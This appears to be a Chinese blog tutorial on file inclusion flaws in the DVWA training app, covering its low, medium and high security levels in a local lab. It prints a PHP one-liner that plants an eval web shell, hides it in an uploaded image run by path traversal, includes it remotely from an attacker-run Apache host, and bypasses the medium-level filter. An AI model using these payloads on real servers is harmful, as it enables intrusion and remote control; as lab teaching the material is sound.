网络攻防入门---文件包含漏洞

- 日理万妓 2022-12-31 02:24 135阅读 0赞

有些网页具有包含其他页面到当前页面的功能，是通过URL设置参数添加进来的，比如下面这个URL

http://192.168.232.128/dvwa/vulnerabilities/fi/?page=include.php

将include.php包含进来

一：low级别

<?php
    
        $file = $_GET['page']; //The page we wish to display 
    
    ?>

因为源码中没有对页面进行检查，直接包含，所以可以随意引入其他页面

比如引入c.php  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70]  
也可以在文件里添加恶意代码，执行之后会在目标服务器生成木马，以此来入侵目标系统。

下面这行代码能够生成一句话目标

<?fputs(fopen("shell1.php","w"),'<?php @eval($_POST[chopper]);?>')?>

通过工具**edjpgcom**，给图片添加这行代码  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70 1]  
然后通过文件上传功能上传该图片到服务器，之后通过URL

http://192.168.232.128/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/hacker.jpg

去执行图片中的代码

执行成功将生成一堆乱码  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70 2]  
并且在该路径下生成shell1.php的木马文件，之后就可以通过中国菜刀利用该木马控制目标服务器

**通过包含远程服务器的文件，执行其中代码生成木马文件**

先在kali启动Apache作为远程服务器

systemctl start apache2

在kali的Apache HTML目录下添加含有生成木马的文件

/var/www/html/test.txt

<?fputs(fopen("shell50.php","w"),'<?php @eval($_POST[chopper]);?>')?>

再在目标网站页面上执行URL

http://192.168.232.128/dvwa/vulnerabilities/fi/?page=http://192.168.232.129/test.txt

便会在目标网站页面当前的目录下生成木马文件，之后的操作与前面相同。

二：medium级别

<?php
    
        $file = $_GET['page']; // The page we wish to display 
    
        // Bad input validation
        $file = str_replace("http://", "", $file);
        $file = str_replace("https://", "", $file);        
    
    
    ?>

对包含文件的路径进行了过滤，把所有的“http://”，“https://” 都替换成了空。

这样不能直接添加URL路径，不过可以简单的对URL进行修改就可以绕过这个过滤

httphttp://://192.168.232.129/test.txt

三：high级别

<?php
            
        $file = $_GET['page']; //The page we wish to display 
    
        // Only allow include.php
        if ( $file != "include.php" ) { 
            echo "ERROR: File not found!";
            exit;
        }
            
    ?>

只允许添加include.php文件，此时因为严格限制可包含的文件，所以无法再通过常规的方式进行攻击。

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70]: /images/20221120/f561dbffb3a64254ae66e0185521c3f3.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70 1]: /images/20221120/b79be6b18b0d4012b9223063d2960760.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6bGRt_size_16_color_FFFFFF_t_70 2]: /images/20221120/bcd5eb0faaca4052990c6c1f9f5e5a89.png